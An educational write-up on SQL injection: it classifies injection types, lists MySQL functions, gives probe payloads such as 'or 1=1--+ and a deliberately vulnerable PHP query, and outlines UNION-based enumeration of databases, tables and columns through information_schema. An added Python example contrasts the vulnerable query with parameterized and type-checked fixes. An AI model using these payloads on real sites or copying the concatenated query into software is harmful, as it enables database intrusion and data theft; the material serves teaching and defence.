Classification of SQL injections
Based on the response received from the server
- Error-based SQL injection
- UNION-query SQL injection
- Stacked-query SQL injection (several statements in one request)
- Blind SQL injection
  - Boolean-based blind SQL injection
  - Time-based blind SQL injection
  - Error-based blind SQL injection
Based on the data type of the injected parameter (how the input is processed)
- String-based
- Numeric (integer) based
Based on degree and order (where the effect occurs)
- First-order injection
- Second-order injection
First-order injection means the injected input acts on the web application directly, and the result is visible at once.
Second-order injection is similar to stored XSS: the submitted input does not affect the web application directly, but is stored and later used in some other operation, where it does the harm. This is called second-order injection.
Based on the location of the injection point
- Injection via form fields (user input)
- Injection via Cookie
- Injection via server variables (header-based injection)
System functions
Commonly used functions for database injection
- version() — database version
- user() — current database user
- database() — current database name
- @@datadir — database data directory (a system variable, not a function)
- @@version_compile_os — operating system the server was compiled for
String concatenation functions
- concat(str1,str2,...) — concatenate strings with no delimiter
- concat_ws(separator,str1,str2,...) — concatenate strings with a separator
- group_concat(str1,str2,...) — concatenate the values of a whole group (all matching rows) into one string, separated by commas by default
Reference: https://blog.csdn.net/Fly_hps/article/details/80223915
Statements generally used for probing
- or 1=1--+
- 'or 1=1--+
- "or 1=1--+
- )or 1=1--+
- ')or 1=1--+
- ") or 1=1--+
- "))or 1=1--+
The general (vulnerable) code is:
$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
Two points matter here:
one is closing the preceding ', the other is dealing with the trailing '. There are generally two approaches: close the quotation marks, or comment the rest out with --+ or # (%23).
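As an added example (not code from the original page), the general code above is reproduced in Python against an in-memory SQLite table, next to the parameterized form that a quote or comment in the input cannot break out of. The `users` table layout and its three rows are constructed; SQLite stands in for MySQL, and `--` starts a comment in both (the page's `--+` is the URL-encoded form, the `+` decoding to the space MySQL requires after `--`).

```python
import sqlite3

# Constructed sample data: a small in-memory table standing in for the
# MySQL `users` table the page's PHP queries (assumed columns: id, username, password).
ROWS = [(1, "alice", "pw1"), (2, "bob", "pw2"), (3, "carol", "pw3")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", ROWS)
    return conn


def lookup_vulnerable(conn, user_id):
    """Mirrors the page's $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    the caller's string is pasted into the SQL text, quotes and all."""
    sql = f"SELECT * FROM users WHERE id='{user_id}' LIMIT 0,1"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, user_id):
    """Same query with a bound parameter: the driver passes the value separately
    from the SQL text, so a quote or comment inside it is data, never syntax."""
    sql = "SELECT * FROM users WHERE id=? LIMIT 0,1"
    return conn.execute(sql, (user_id,)).fetchall()


def lookup_typed(conn, user_id):
    """For a numeric id (the page's 'numeric based' case) also enforce the type
    before the database sees the value; anything that is not an integer is rejected."""
    try:
        n = int(user_id)
    except (TypeError, ValueError):
        raise ValueError("id must be an integer")
    return lookup_parameterized(conn, n)


# The page's probe for a single-quoted string parameter, with the trailing
# space that '--+' decodes to.
PAYLOAD = "999' or 1=1-- "


def demo():
    conn = make_db()
    return {
        "normal": lookup_vulnerable(conn, "1"),
        "missing_id": lookup_vulnerable(conn, "999"),
        # The quote closes id='999', "or 1=1" makes the WHERE true for every
        # row, and "-- " comments out the original ' LIMIT 0,1, so every row comes back.
        "vulnerable_with_payload": lookup_vulnerable(conn, PAYLOAD),
        # Bound as a literal, the same payload simply matches no id.
        "parameterized_with_payload": lookup_parameterized(conn, PAYLOAD),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

The comparison shows why both ideas on the page (closing the quote, commenting out the tail) work against the concatenated query and do nothing against the bound one; for numeric parameters, converting to `int` before the query adds a second, independent check.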
Introduction to the UNION operator
The UNION operator combines the result sets of two or more SELECT statements. Note that every SELECT inside a UNION must return the same number of columns; the columns must also have compatible data types and appear in the same order in each SELECT statement.
SQL UNION syntax:
SELECT column_name(s) FROM table_name1 UNION SELECT column_name(s) FROM table_name2
Note: by default, UNION returns only distinct rows. To keep duplicate rows, use UNION ALL.
Injection process
- Guess the databases: select schema_name from information_schema.schemata
- Guess the tables of a database: select table_name from information_schema.tables where table_schema='xxxxx'
- Guess all columns of a table: select column_name from information_schema.columns where table_name='xxxxx'
- Read the contents of a column: select *** from ****